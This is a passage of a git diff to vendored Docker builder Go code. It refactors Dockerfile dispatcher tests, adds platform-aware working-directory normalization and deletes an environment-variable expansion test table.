+	expectedTest := []string{"CMD-SHELL", "curl -f http://localhost/ || exit 1"}
+	cmd := &instructions.HealthCheckCommand{
+		Health: &container.HealthConfig{
+			Test: expectedTest,
+		},
 	}
+	err := dispatch(sb, cmd)
+	assert.NilError(t, err)
 
-	expectedTest := strslice.StrSlice(append([]string{"CMD-SHELL"}, "curl -f http://localhost/ || exit 1"))
-
-	if !compareStrSlice(expectedTest, b.runConfig.Healthcheck.Test) {
-		t.Fatalf("Command should be set to %s, got %s", expectedTest, b.runConfig.Healthcheck.Test)
-	}
+	assert.Assert(t, sb.state.runConfig.Healthcheck != nil)
+	assert.Check(t, is.DeepEqual(expectedTest, sb.state.runConfig.Healthcheck.Test))
 }
 
 func TestEntrypoint(t *testing.T) {
-	b := &Builder{flags: &BFlags{}, runConfig: &container.Config{}, disableCommit: true}
-
+	b := newBuilderWithMockBackend()
+	sb := newDispatchRequest(b, '`', nil, NewBuildArgs(make(map[string]*string)), newStagesBuildResults())
+	sb.state.baseImage = &mockImage{}
 	entrypointCmd := "/usr/sbin/nginx"
 
-	if err := entrypoint(b, []string{entrypointCmd}, nil, ""); err != nil {
-		t.Fatalf("Error should be empty, got: %s", err.Error())
-	}
-
-	if b.runConfig.Entrypoint == nil {
-		t.Fatalf("Entrypoint should be set")
+	cmd := &instructions.EntrypointCommand{
+		ShellDependantCmdLine: instructions.ShellDependantCmdLine{
+			CmdLine:      strslice.StrSlice{entrypointCmd},
+			PrependShell: true,
+		},
 	}
+	err := dispatch(sb, cmd)
+	assert.NilError(t, err)
+	assert.Assert(t, sb.state.runConfig.Entrypoint != nil)
 
 	var expectedEntrypoint strslice.StrSlice
-
 	if runtime.GOOS == "windows" {
 		expectedEntrypoint = strslice.StrSlice(append([]string{"cmd"}, "/S", "/C", entrypointCmd))
 	} else {
 		expectedEntrypoint = strslice.StrSlice(append([]string{"/bin/sh"}, "-c", entrypointCmd))
 	}
-
-	if !compareStrSlice(expectedEntrypoint, b.runConfig.Entrypoint) {
-		t.Fatalf("Entrypoint command should be set to %s, got %s", expectedEntrypoint, b.runConfig.Entrypoint)
-	}
+	assert.Check(t, is.DeepEqual(expectedEntrypoint, sb.state.runConfig.Entrypoint))
 }
 
 func TestExpose(t *testing.T) {
-	b := &Builder{flags: &BFlags{}, runConfig: &container.Config{}, disableCommit: true}
+	b := newBuilderWithMockBackend()
+	sb := newDispatchRequest(b, '`', nil, NewBuildArgs(make(map[string]*string)), newStagesBuildResults())
 
 	exposedPort := "80"
-
-	if err := expose(b, []string{exposedPort}, nil, ""); err != nil {
-		t.Fatalf("Error should be empty, got: %s", err.Error())
+	cmd := &instructions.ExposeCommand{
+		Ports: []string{exposedPort},
 	}
+	err := dispatch(sb, cmd)
+	assert.NilError(t, err)
 
-	if b.runConfig.ExposedPorts == nil {
-		t.Fatalf("ExposedPorts should be set")
-	}
-
-	if len(b.runConfig.ExposedPorts) != 1 {
-		t.Fatalf("ExposedPorts should contain only 1 element. Got %s", b.runConfig.ExposedPorts)
-	}
+	assert.Assert(t, sb.state.runConfig.ExposedPorts != nil)
+	assert.Assert(t, is.Len(sb.state.runConfig.ExposedPorts, 1))
 
 	portsMapping, err := nat.ParsePortSpec(exposedPort)
-
-	if err != nil {
-		t.Fatalf("Error when parsing port spec: %s", err.Error())
-	}
-
-	if _, ok := b.runConfig.ExposedPorts[portsMapping[0].Port]; !ok {
-		t.Fatalf("Port %s should be present. Got %s", exposedPort, b.runConfig.ExposedPorts)
-	}
+	assert.NilError(t, err)
+	assert.Check(t, is.Contains(sb.state.runConfig.ExposedPorts, portsMapping[0].Port))
 }
 
 func TestUser(t *testing.T) {
-	b := &Builder{flags: &BFlags{}, runConfig: &container.Config{}, disableCommit: true}
+	b := newBuilderWithMockBackend()
+	sb := newDispatchRequest(b, '`', nil, NewBuildArgs(make(map[string]*string)), newStagesBuildResults())
 
-	userCommand := "foo"
-
-	if err := user(b, []string{userCommand}, nil, ""); err != nil {
-		t.Fatalf("Error should be empty, got: %s", err.Error())
-	}
-
-	if b.runConfig.User != userCommand {
-		t.Fatalf("User should be set to %s, got %s", userCommand, b.runConfig.User)
+	cmd := &instructions.UserCommand{
+		User: "test",
 	}
+	err := dispatch(sb, cmd)
+	assert.NilError(t, err)
+	assert.Check(t, is.Equal("test", sb.state.runConfig.User))
 }
 
 func TestVolume(t *testing.T) {
-	b := &Builder{flags: &BFlags{}, runConfig: &container.Config{}, disableCommit: true}
+	b := newBuilderWithMockBackend()
+	sb := newDispatchRequest(b, '`', nil, NewBuildArgs(make(map[string]*string)), newStagesBuildResults())
 
 	exposedVolume := "/foo"
 
-	if err := volume(b, []string{exposedVolume}, nil, ""); err != nil {
-		t.Fatalf("Error should be empty, got: %s", err.Error())
-	}
-
-	if b.runConfig.Volumes == nil {
-		t.Fatalf("Volumes should be set")
-	}
-
-	if len(b.runConfig.Volumes) != 1 {
-		t.Fatalf("Volumes should contain only 1 element. Got %s", b.runConfig.Volumes)
-	}
-
-	if _, ok := b.runConfig.Volumes[exposedVolume]; !ok {
-		t.Fatalf("Volume %s should be present. Got %s", exposedVolume, b.runConfig.Volumes)
+	cmd := &instructions.VolumeCommand{
+		Volumes: []string{exposedVolume},
 	}
+	err := dispatch(sb, cmd)
+	assert.NilError(t, err)
+	assert.Assert(t, sb.state.runConfig.Volumes != nil)
+	assert.Check(t, is.Len(sb.state.runConfig.Volumes, 1))
+	assert.Check(t, is.Contains(sb.state.runConfig.Volumes, exposedVolume))
 }
 
 func TestStopSignal(t *testing.T) {
-	b := &Builder{flags: &BFlags{}, runConfig: &container.Config{}, disableCommit: true}
-
-	signal := "SIGKILL"
-
-	if err := stopSignal(b, []string{signal}, nil, ""); err != nil {
-		t.Fatalf("Error should be empty, got: %s", err.Error())
+	if runtime.GOOS == "windows" {
+		t.Skip("Windows does not support stopsignal")
+		return
 	}
+	b := newBuilderWithMockBackend()
+	sb := newDispatchRequest(b, '`', nil, NewBuildArgs(make(map[string]*string)), newStagesBuildResults())
+	sb.state.baseImage = &mockImage{}
+	signal := "SIGKILL"
 
-	if b.runConfig.StopSignal != signal {
-		t.Fatalf("StopSignal should be set to %s, got %s", signal, b.runConfig.StopSignal)
+	cmd := &instructions.StopSignalCommand{
+		Signal: signal,
 	}
+	err := dispatch(sb, cmd)
+	assert.NilError(t, err)
+	assert.Check(t, is.Equal(signal, sb.state.runConfig.StopSignal))
 }
 
 func TestArg(t *testing.T) {
-	buildOptions := &types.ImageBuildOptions{BuildArgs: make(map[string]*string)}
-
-	b := &Builder{flags: &BFlags{}, runConfig: &container.Config{}, disableCommit: true, allowedBuildArgs: make(map[string]bool), options: buildOptions}
+	b := newBuilderWithMockBackend()
+	sb := newDispatchRequest(b, '`', nil, NewBuildArgs(make(map[string]*string)), newStagesBuildResults())
 
 	argName := "foo"
 	argVal := "bar"
-	argDef := fmt.Sprintf("%s=%s", argName, argVal)
+	cmd := &instructions.ArgCommand{Key: argName, Value: &argVal}
+	err := dispatch(sb, cmd)
+	assert.NilError(t, err)
 
-	if err := arg(b, []string{argDef}, nil, ""); err != nil {
-		t.Fatalf("Error should be empty, got: %s", err.Error())
-	}
-
-	allowed, ok := b.allowedBuildArgs[argName]
-
-	if !ok {
-		t.Fatalf("%s argument should be allowed as a build arg", argName)
-	}
-
-	if !allowed {
-		t.Fatalf("%s argument was present in map but disallowed as a build arg", argName)
-	}
-
-	val, ok := b.options.BuildArgs[argName]
-
-	if !ok {
-		t.Fatalf("%s argument should be a build arg", argName)
-	}
-
-	if *val != "bar" {
-		t.Fatalf("%s argument should have default value 'bar', got %s", argName, val)
-	}
+	expected := map[string]string{argName: argVal}
+	assert.Check(t, is.DeepEqual(expected, sb.state.buildArgs.GetAllAllowed()))
 }
 
 func TestShell(t *testing.T) {
-	b := &Builder{flags: &BFlags{}, runConfig: &container.Config{}, disableCommit: true}
+	b := newBuilderWithMockBackend()
+	sb := newDispatchRequest(b, '`', nil, NewBuildArgs(make(map[string]*string)), newStagesBuildResults())
 
 	shellCmd := "powershell"
+	cmd := &instructions.ShellCommand{Shell: strslice.StrSlice{shellCmd}}
 
-	attrs := make(map[string]bool)
-	attrs["json"] = true
+	err := dispatch(sb, cmd)
+	assert.NilError(t, err)
 
-	if err := shell(b, []string{shellCmd}, attrs, ""); err != nil {
-		t.Fatalf("Error should be empty, got: %s", err.Error())
-	}
+	expectedShell := strslice.StrSlice([]string{shellCmd})
+	assert.Check(t, is.DeepEqual(expectedShell, sb.state.runConfig.Shell))
+}
 
-	if b.runConfig.Shell == nil {
-		t.Fatalf("Shell should be set")
-	}
+func TestPrependEnvOnCmd(t *testing.T) {
+	buildArgs := NewBuildArgs(nil)
+	buildArgs.AddArg("NO_PROXY", nil)
 
-	expectedShell := strslice.StrSlice([]string{shellCmd})
+	args := []string{"sorted=nope", "args=not", "http_proxy=foo", "NO_PROXY=YA"}
+	cmd := []string{"foo", "bar"}
+	cmdWithEnv := prependEnvOnCmd(buildArgs, args, cmd)
+	expected := strslice.StrSlice([]string{
+		"|3", "NO_PROXY=YA", "args=not", "sorted=nope", "foo", "bar"})
+	assert.Check(t, is.DeepEqual(expected, cmdWithEnv))
+}
 
-	if !compareStrSlice(expectedShell, b.runConfig.Shell) {
-		t.Fatalf("Shell should be set to %s, got %s", expectedShell, b.runConfig.Shell)
-	}
+func TestRunWithBuildArgs(t *testing.T) {
+	b := newBuilderWithMockBackend()
+	args := NewBuildArgs(make(map[string]*string))
+	args.argsFromOptions["HTTP_PROXY"] = strPtr("FOO")
+	b.disableCommit = false
+	sb := newDispatchRequest(b, '`', nil, args, newStagesBuildResults())
+
+	runConfig := &container.Config{}
+	origCmd := strslice.StrSlice([]string{"cmd", "in", "from", "image"})
+	cmdWithShell := strslice.StrSlice(append(getShell(runConfig, runtime.GOOS), "echo foo"))
+	envVars := []string{"|1", "one=two"}
+	cachedCmd := strslice.StrSlice(append(envVars, cmdWithShell...))
+
+	imageCache := &mockImageCache{
+		getCacheFunc: func(parentID string, cfg *container.Config) (string, error) {
+			// Check the runConfig.Cmd sent to probeCache()
+			assert.Check(t, is.DeepEqual(cachedCmd, cfg.Cmd))
+			assert.Check(t, is.DeepEqual(strslice.StrSlice(nil), cfg.Entrypoint))
+			return "", nil
+		},
+	}
+
+	mockBackend := b.docker.(*MockBackend)
+	mockBackend.makeImageCacheFunc = func(_ []string) builder.ImageCache {
+		return imageCache
+	}
+	b.imageProber = newImageProber(mockBackend, nil, false)
+	mockBackend.getImageFunc = func(_ string) (builder.Image, builder.ROLayer, error) {
+		return &mockImage{
+			id:     "abcdef",
+			config: &container.Config{Cmd: origCmd},
+		}, nil, nil
+	}
+	mockBackend.containerCreateFunc = func(config types.ContainerCreateConfig) (container.ContainerCreateCreatedBody, error) {
+		// Check the runConfig.Cmd sent to create()
+		assert.Check(t, is.DeepEqual(cmdWithShell, config.Config.Cmd))
+		assert.Check(t, is.Contains(config.Config.Env, "one=two"))
+		assert.Check(t, is.DeepEqual(strslice.StrSlice{""}, config.Config.Entrypoint))
+		return container.ContainerCreateCreatedBody{ID: "12345"}, nil
+	}
+	mockBackend.commitFunc = func(cfg backend.CommitConfig) (image.ID, error) {
+		// Check the runConfig.Cmd sent to commit()
+		assert.Check(t, is.DeepEqual(origCmd, cfg.Config.Cmd))
+		assert.Check(t, is.DeepEqual(cachedCmd, cfg.ContainerConfig.Cmd))
+		assert.Check(t, is.DeepEqual(strslice.StrSlice(nil), cfg.Config.Entrypoint))
+		return "", nil
+	}
+	from := &instructions.Stage{BaseName: "abcdef"}
+	err := initializeStage(sb, from)
+	assert.NilError(t, err)
+	sb.state.buildArgs.AddArg("one", strPtr("two"))
+	run := &instructions.RunCommand{
+		ShellDependantCmdLine: instructions.ShellDependantCmdLine{
+			CmdLine:      strslice.StrSlice{"echo foo"},
+			PrependShell: true,
+		},
+	}
+	assert.NilError(t, dispatch(sb, run))
+
+	// Check that runConfig.Cmd has not been modified by run
+	assert.Check(t, is.DeepEqual(origCmd, sb.state.runConfig.Cmd))
 }
diff --git a/vendor/github.com/docker/docker/builder/dockerfile/dispatchers_unix.go b/vendor/github.com/docker/docker/builder/dockerfile/dispatchers_unix.go
index 8b0dfc3911..b3ba380323 100644
--- a/vendor/github.com/docker/docker/builder/dockerfile/dispatchers_unix.go
+++ b/vendor/github.com/docker/docker/builder/dockerfile/dispatchers_unix.go
@@ -1,18 +1,18 @@
 // +build !windows
 
-package dockerfile
+package dockerfile // import "github.com/docker/docker/builder/dockerfile"
 
 import (
-	"fmt"
+	"errors"
 	"os"
 	"path/filepath"
 )
 
-// normaliseWorkdir normalises a user requested working directory in a
-// platform sematically consistent way.
-func normaliseWorkdir(current string, requested string) (string, error) {
+// normalizeWorkdir normalizes a user requested working directory in a
+// platform semantically consistent way.
+func normalizeWorkdir(_ string, current string, requested string) (string, error) {
 	if requested == "" {
-		return "", fmt.Errorf("cannot normalise nothing")
+		return "", errors.New("cannot normalize nothing")
 	}
 	current = filepath.FromSlash(current)
 	requested = filepath.FromSlash(requested)
@@ -21,7 +21,3 @@ func normaliseWorkdir(current string, requested string) (string, error) {
 	}
 	return requested, nil
 }
-
-func errNotJSON(command, _ string) error {
-	return fmt.Errorf("%s requires the arguments to be in JSON form", command)
-}
diff --git a/vendor/github.com/docker/docker/builder/dockerfile/dispatchers_unix_test.go b/vendor/github.com/docker/docker/builder/dockerfile/dispatchers_unix_test.go
index 4aae6b460e..c2aebfbb27 100644
--- a/vendor/github.com/docker/docker/builder/dockerfile/dispatchers_unix_test.go
+++ b/vendor/github.com/docker/docker/builder/dockerfile/dispatchers_unix_test.go
@@ -1,14 +1,15 @@
 // +build !windows
 
-package dockerfile
+package dockerfile // import "github.com/docker/docker/builder/dockerfile"
 
 import (
+	"runtime"
 	"testing"
 )
 
-func TestNormaliseWorkdir(t *testing.T) {
+func TestNormalizeWorkdir(t *testing.T) {
 	testCases := []struct{ current, requested, expected, expectedError string }{
-		{``, ``, ``, `cannot normalise nothing`},
+		{``, ``, ``, `cannot normalize nothing`},
 		{``, `foo`, `/foo`, ``},
 		{``, `/foo`, `/foo`, ``},
 		{`/foo`, `bar`, `/foo/bar`, ``},
@@ -16,18 +17,18 @@ func TestNormaliseWorkdir(t *testing.T) {
 	}
 
 	for _, test := range testCases {
-		normalised, err := normaliseWorkdir(test.current, test.requested)
+		normalized, err := normalizeWorkdir(runtime.GOOS, test.current, test.requested)
 
 		if test.expectedError != "" && err == nil {
-			t.Fatalf("NormaliseWorkdir should return an error %s, got nil", test.expectedError)
+			t.Fatalf("NormalizeWorkdir should return an error %s, got nil", test.expectedError)
 		}
 
 		if test.expectedError != "" && err.Error() != test.expectedError {
-			t.Fatalf("NormaliseWorkdir returned wrong error. Expected %s, got %s", test.expectedError, err.Error())
+			t.Fatalf("NormalizeWorkdir returned wrong error. Expected %s, got %s", test.expectedError, err.Error())
 		}
 
-		if normalised != test.expected {
-			t.Fatalf("NormaliseWorkdir error. Expected %s for current %s and requested %s, got %s", test.expected, test.current, test.requested, normalised)
+		if normalized != test.expected {
+			t.Fatalf("NormalizeWorkdir error. Expected %s for current %s and requested %s, got %s", test.expected, test.current, test.requested, normalized)
 		}
 	}
 }
diff --git a/vendor/github.com/docker/docker/builder/dockerfile/dispatchers_windows.go b/vendor/github.com/docker/docker/builder/dockerfile/dispatchers_windows.go
index e890c3ae18..7824d1169b 100644
--- a/vendor/github.com/docker/docker/builder/dockerfile/dispatchers_windows.go
+++ b/vendor/github.com/docker/docker/builder/dockerfile/dispatchers_windows.go
@@ -1,8 +1,10 @@
-package dockerfile
+package dockerfile // import "github.com/docker/docker/builder/dockerfile"
 
 import (
+	"errors"
 	"fmt"
 	"os"
+	"path"
 	"path/filepath"
 	"regexp"
 	"strings"
@@ -12,11 +14,37 @@ import (
 
 var pattern = regexp.MustCompile(`^[a-zA-Z]:\.$`)
 
-// normaliseWorkdir normalises a user requested working directory in a
-// platform sematically consistent way.
-func normaliseWorkdir(current string, requested string) (string, error) {
+// normalizeWorkdir normalizes a user requested working directory in a
+// platform semantically consistent way.
+func normalizeWorkdir(platform string, current string, requested string) (string, error) {
+	if platform == "" {
+		platform = "windows"
+	}
+	if platform == "windows" {
+		return normalizeWorkdirWindows(current, requested)
+	}
+	return normalizeWorkdirUnix(current, requested)
+}
+
+// normalizeWorkdirUnix normalizes a user requested working directory in a
+// platform semantically consistent way.
+func normalizeWorkdirUnix(current string, requested string) (string, error) {
+	if requested == "" {
+		return "", errors.New("cannot normalize nothing")
+	}
+	current = strings.Replace(current, string(os.PathSeparator), "/", -1)
+	requested = strings.Replace(requested, string(os.PathSeparator), "/", -1)
+	if !path.IsAbs(requested) {
+		return path.Join(`/`, current, requested), nil
+	}
+	return requested, nil
+}
+
+// normalizeWorkdirWindows normalizes a user requested working directory in a
+// platform semantically consistent way.
+func normalizeWorkdirWindows(current string, requested string) (string, error) {
 	if requested == "" {
-		return "", fmt.Errorf("cannot normalise nothing")
+		return "", errors.New("cannot normalize nothing")
 	}
 
 	// `filepath.Clean` will replace "" with "." so skip in that case
@@ -65,22 +93,3 @@ func normaliseWorkdir(current string, requested string) (string, error) {
 	// Upper-case drive letter
 	return (strings.ToUpper(string(requested[0])) + requested[1:]), nil
 }
-
-func errNotJSON(command, original string) error {
-	// For Windows users, give a hint if it looks like it might contain
-	// a path which hasn't been escaped such as ["c:\windows\system32\prog.exe", "-param"],
-	// as JSON must be escaped. Unfortunate...
-	//
-	// Specifically looking for quote-driveletter-colon-backslash, there's no
-	// double backslash and a [] pair. No, this is not perfect, but it doesn't
-	// have to be. It's simply a hint to make life a little easier.
-	extra := ""
-	original = filepath.FromSlash(strings.ToLower(strings.Replace(strings.ToLower(original), strings.ToLower(command)+" ", "", -1)))
-	if len(regexp.MustCompile(`"[a-z]:\\.*`).FindStringSubmatch(original)) > 0 &&
-		!strings.Contains(original, `\\`) &&
-		strings.Contains(original, "[") &&
-		strings.Contains(original, "]") {
-		extra = fmt.Sprintf(`. It looks like '%s' includes a file path without an escaped back-slash. JSON requires back-slashes to be escaped such as ["c:\\path\\to\\file.exe", "/parameter"]`, original)
-	}
-	return fmt.Errorf("%s requires the arguments to be in JSON form%s", command, extra)
-}
diff --git a/vendor/github.com/docker/docker/builder/dockerfile/dispatchers_windows_test.go b/vendor/github.com/docker/docker/builder/dockerfile/dispatchers_windows_test.go
index 3319c06582..ae72092c4f 100644
--- a/vendor/github.com/docker/docker/builder/dockerfile/dispatchers_windows_test.go
+++ b/vendor/github.com/docker/docker/builder/dockerfile/dispatchers_windows_test.go
@@ -1,40 +1,46 @@
 // +build windows
 
-package dockerfile
+package dockerfile // import "github.com/docker/docker/builder/dockerfile"
 
 import "testing"
 
-func TestNormaliseWorkdir(t *testing.T) {
-	tests := []struct{ current, requested, expected, etext string }{
-		{``, ``, ``, `cannot normalise nothing`},
-		{``, `C:`, ``, `C:. is not a directory. If you are specifying a drive letter, please add a trailing '\'`},
-		{``, `C:.`, ``, `C:. is not a directory. If you are specifying a drive letter, please add a trailing '\'`},
-		{`c:`, `\a`, ``, `c:. is not a directory. If you are specifying a drive letter, please add a trailing '\'`},
-		{`c:.`, `\a`, ``, `c:. is not a directory. If you are specifying a drive letter, please add a trailing '\'`},
-		{``, `a`, `C:\a`, ``},
-		{``, `c:\foo`, `C:\foo`, ``},
-		{``, `c:\\foo`, `C:\foo`, ``},
-		{``, `\foo`, `C:\foo`, ``},
-		{``, `\\foo`, `C:\foo`, ``},
-		{``, `/foo`, `C:\foo`, ``},
-		{``, `C:/foo`, `C:\foo`, ``},
-		{`C:\foo`, `bar`, `C:\foo\bar`, ``},
-		{`C:\foo`, `/bar`, `C:\bar`, ``},
-		{`C:\foo`, `\bar`, `C:\bar`, ``},
+func TestNormalizeWorkdir(t *testing.T) {
+	tests := []struct{ platform, current, requested, expected, etext string }{
+		{"windows", ``, ``, ``, `cannot normalize nothing`},
+		{"windows", ``, `C:`, ``, `C:. is not a directory. If you are specifying a drive letter, please add a trailing '\'`},
+		{"windows", ``, `C:.`, ``, `C:. is not a directory. If you are specifying a drive letter, please add a trailing '\'`},
+		{"windows", `c:`, `\a`, ``, `c:. is not a directory. If you are specifying a drive letter, please add a trailing '\'`},
+		{"windows", `c:.`, `\a`, ``, `c:. is not a directory. If you are specifying a drive letter, please add a trailing '\'`},
+		{"windows", ``, `a`, `C:\a`, ``},
+		{"windows", ``, `c:\foo`, `C:\foo`, ``},
+		{"windows", ``, `c:\\foo`, `C:\foo`, ``},
+		{"windows", ``, `\foo`, `C:\foo`, ``},
+		{"windows", ``, `\\foo`, `C:\foo`, ``},
+		{"windows", ``, `/foo`, `C:\foo`, ``},
+		{"windows", ``, `C:/foo`, `C:\foo`, ``},
+		{"windows", `C:\foo`, `bar`, `C:\foo\bar`, ``},
+		{"windows", `C:\foo`, `/bar`, `C:\bar`, ``},
+		{"windows", `C:\foo`, `\bar`, `C:\bar`, ``},
+		{"linux", ``, ``, ``, `cannot normalize nothing`},
+		{"linux", ``, `foo`, `/foo`, ``},
+		{"linux", ``, `/foo`, `/foo`, ``},
+		{"linux", `/foo`, `bar`, `/foo/bar`, ``},
+		{"linux", `/foo`, `/bar`, `/bar`, ``},
+		{"linux", `\a`, `b\c`, `/a/b/c`, ``},
 	}
 	for _, i := range tests {
-		r, e := normaliseWorkdir(i.current, i.requested)
+		r, e := normalizeWorkdir(i.platform, i.current, i.requested)
 
 		if i.etext != "" && e == nil {
-			t.Fatalf("TestNormaliseWorkingDir Expected error %s for '%s' '%s', got no error", i.etext, i.current, i.requested)
+			t.Fatalf("TestNormalizeWorkingDir Expected error %s for '%s' '%s', got no error", i.etext, i.current, i.requested)
 		}
 
 		if i.etext != "" && e.Error() != i.etext {
-			t.Fatalf("TestNormaliseWorkingDir Expected error %s for '%s' '%s', got %s", i.etext, i.current, i.requested, e.Error())
+			t.Fatalf("TestNormalizeWorkingDir Expected error %s for '%s' '%s', got %s", i.etext, i.current, i.requested, e.Error())
 		}
 
 		if r != i.expected {
-			t.Fatalf("TestNormaliseWorkingDir Expected '%s' for '%s' '%s', got '%s'", i.expected, i.current, i.requested, r)
+			t.Fatalf("TestNormalizeWorkingDir Expected '%s' for '%s' '%s', got '%s'", i.expected, i.current, i.requested, r)
 		}
 	}
 }
diff --git a/vendor/github.com/docker/docker/builder/dockerfile/envVarTest b/vendor/github.com/docker/docker/builder/dockerfile/envVarTest
deleted file mode 100644
index 067dca9a54..0000000000
--- a/vendor/github.com/docker/docker/builder/dockerfile/envVarTest
+++ /dev/null
@@ -1,116 +0,0 @@
-A|hello                    |     hello
-A|he'll'o                  |     hello
-A|he'llo                   |     hello
-A|he\'llo                  |     he'llo
-A|he\\'llo                 |     he\llo
-A|abc\tdef                 |     abctdef
-A|"abc\tdef"               |     abc\tdef
-A|'abc\tdef'               |     abc\tdef
-A|hello\                   |     hello
-A|hello\\                  |     hello\
-A|"hello                   |     hello
-A|"hello\"                 |     hello"
-A|"hel'lo"                 |     hel'lo
-A|'hello                   |     hello
-A|'hello\'                 |     hello\
-A|"''"                     |     ''
-A|$.                       |     $.
-A|$1                       |
-A|he$1x                    |     hex
-A|he$.x                    |     he$.x
-# Next one is different on Windows as $pwd==$PWD
-U|he$pwd.                  |     he.
-W|he$pwd.                  |     he/home.
-A|he$PWD                   |     he/home
-A|he\$PWD                  |     he$PWD
-A|he\\$PWD                 |     he\/home
-A|he\${}                   |     he${}
-A|he\${}xx                 |     he${}xx
-A|he${}                    |     he
-A|he${}xx                  |     hexx
-A|he${hi}                  |     he
-A|he${hi}xx                |     hexx
-A|he${PWD}                 |     he/home
-A|he${.}                   |     error
-A|he${XXX:-000}xx          |     he000xx
-A|he${PWD:-000}xx          |     he/homexx
-A|he${XXX:-$PWD}xx         |     he/homexx
-A|he${XXX:-${PWD:-yyy}}xx  |     he/homexx
-A|he${XXX:-${YYY:-yyy}}xx  |     heyyyxx
-A|he${XXX:YYY}             |     error
-A|he${XXX:+${PWD}}xx       |     hexx
-A|he${PWD:+${XXX}}xx       |     hexx
-A|he${PWD:+${SHELL}}xx     |     hebashxx
-A|he${XXX:+000}xx          |     hexx
-A|he${PWD:+000}xx          |     he000xx
-A|'he${XX}'                |     he${XX}
-A|"he${PWD}"               |     he/home
-A|"he'$PWD'"               |     he'/home'
-A|"$PWD"                   |     /home
-A|'$PWD'                   |     $PWD
-A|'\$PWD'                  |     \$PWD
-A|'"hello"'                |     "hello"
-A|he\$PWD                  |     he$PWD
-A|"he\$PWD"                |     he$PWD
-A|'he\$PWD'                |     he\$PWD
-A|he${PWD                  |     error
-A|he${PWD:=000}xx          |     error
-A|he${PWD:+${PWD}:}xx      |     he/home:xx
-A|he${XXX:-\$PWD:}xx       |     he$PWD:xx
-A|he${XXX:-\${PWD}z}xx     |     he${PWDz}xx
-A|안녕하세요                 |     안녕하세요
-A|안'녕'하세요               |     안녕하세요
-A|안'녕하세요                |     안녕하세요
-A|안녕\'하세요               |     안녕'하세요
-A|안\\'녕하세요              |     안\녕하세요
-A|안녕\t하세요               |     안녕t하세요
-A|"안녕\t하세요"             |     안녕\t하세요
-A|'안녕\t하세요              |     안녕\t하세요
-A|안녕하세요\                |     안녕하세요
-A|안녕하세요\\               |     안녕하세요\
-A|"안녕하세요                |     안녕하세요
-A|"안녕하세요\"              |     안녕하세요"
-A|"안녕'하세요"              |     안녕'하세요
-A|'안녕하세요                |     안녕하세요
-A|'안녕하세요\'              |     안녕하세요\
-A|안녕$1x                    |     안녕x
-A|안녕$.x                    |     안녕$.x
-# Next one is different on Windows as $pwd==$PWD
-U|안녕$pwd.                  |     안녕.
-W|안녕$pwd.                  |     안녕/home.
-A|안녕$PWD                   |     안녕/home
-A|안녕\$PWD                  |     안녕$PWD
-A|안녕\\$PWD                 |     안녕\/home
-A|안녕\${}                   |     안녕${}
-A|안녕\${}xx                 |     안녕${}xx
-A|안녕${}                    |     안녕
-A|안녕${}xx                  |     안녕xx
-A|안녕${hi}                  |     안녕
-A|안녕${hi}xx                |     안녕xx
-A|안녕${PWD}                 |     안녕/home
-A|안녕${.}                   |     error
-A|안녕${XXX:-000}xx          |     안녕000xx
-A|안녕${PWD:-000}xx          |     안녕/homexx
-A|안녕${XXX:-$PWD}xx         |     안녕/homexx
-A|안녕${XXX:-${PWD:-yyy}}xx  |     안녕/homexx
-A|안녕${XXX:-${YYY:-yyy}}xx  |     안녕yyyxx
-A|안녕${XXX:YYY}             |     error
-A|안녕${XXX:+${PWD}}xx       |     안녕xx
-A|안녕${PWD:+${XXX}}xx       |     안녕xx
-A|안녕${PWD:+${SHELL}}xx     |     안녕bashxx
-A|안녕${XXX:+000}xx          |     안녕xx
-A|안녕${PWD:+000}xx          |     안녕000xx
-A|'안녕${XX}'                |     안녕${XX}
-A|"안녕${PWD}"               |     안녕/home
-A|"안녕'$PWD'"               |     안녕'/home'
-A|'"안녕"'                   |     "안녕"
-A|안녕\$PWD                  |     안녕$PWD
-A|"안녕\$PWD"                |     안녕$PWD
-A|'안녕\$PWD'                |     안녕\$PWD
-A|안녕${PWD                  |     error
-A|안녕${PWD:=000}xx          |     error
-A|안녕${PWD:+${PWD}:}xx      |     안녕/home:xx
-A|안녕${XXX:-\$PWD:}xx       |     안녕$PWD:xx
-A|안녕${XXX:-\${PWD}z}xx     |     안녕${PWDz}xx
-A|$KOREAN                    |     한국어
-A|안녕$KOREAN                |     안녕한국어
diff --git a/vendor/github.com/docker/docker/builder/dockerfile/evaluator.go b/vendor/github.com/docker/docker/builder/dockerfile/evaluator.go
index f5997c91a6..02e1477528 100644
--- a/vendor/github.com/docker/docker/builder/dockerfile/evaluator.go
+++ b/vendor/github.com/docker/docker/builder/dockerfile/evaluator.go
@@ -2,7 +2,7 @@
 //
 // It incorporates a dispatch table based on the parser.Node values (see the
 // parser package for more information) that are yielded from the parser itself.
-// Calling NewBuilder with the BuildOpts struct can be used to customize the
+// Calling newBuilder with the BuildOpts struct can be used to customize the
 // experience for execution purposes only. Parsing is controlled in the parser
 // package, and this division of responsibility should be respected.
 //
@@ -17,228 +17,234 @@
 // before and after each step, such as creating an image ID and removing temporary
 // containers and images. Note that ONBUILD creates a kinda-sorta "sub run" which
 // includes its own set of steps (usually only one of them).
-package dockerfile
+package dockerfile // import "github.com/docker/docker/builder/dockerfile"
 
 import (
-	"fmt"
+	"reflect"
+	"runtime"
+	"strconv"
 	"strings"
 
-	"github.com/docker/docker/builder/dockerfile/command"
-	"github.com/docker/docker/builder/dockerfile/parser"
+	"github.com/docker/docker/api/types/container"
+	"github.com/docker/docker/builder"
+	"github.com/docker/docker/errdefs"
+	"github.com/docker/docker/pkg/system"
+	"github.com/docker/docker/runconfig/opts"
+	"github.com/moby/buildkit/frontend/dockerfile/instructions"
+	"github.com/moby/buildkit/frontend/dockerfile/shell"
+	"github.com/pkg/errors"
 )
 
-// Environment variable interpolation will happen on these statements only.
-var replaceEnvAllowed = map[string]bool{
-	command.Env:        true,
-	command.Label:      true,
-	command.Add:        true,
-	command.Copy:       true,
-	command.Workdir:    true,
-	command.Expose:     true,
-	command.Volume:     true,
-	command.User:       true,
-	command.StopSignal: true,
-	command.Arg:        true,
-}
-
-// Certain commands are allowed to have their args split into more
-// words after env var replacements. Meaning:
-//   ENV foo="123 456"
-//   EXPOSE $foo
-// should result in the same thing as:
-//   EXPOSE 123 456
-// and not treat "123 456" as a single word.
-// Note that: EXPOSE "$foo" and EXPOSE $foo are not the same thing.
-// Quotes will cause it to still be treated as single word.
-var allowWordExpansion = map[string]bool{
-	command.Expose: true,
-}
-
-var evaluateTable map[string]func(*Builder, []string, map[string]bool, string) error
-
-func init() {
-	evaluateTable = map[string]func(*Builder, []string, map[string]bool, string) error{
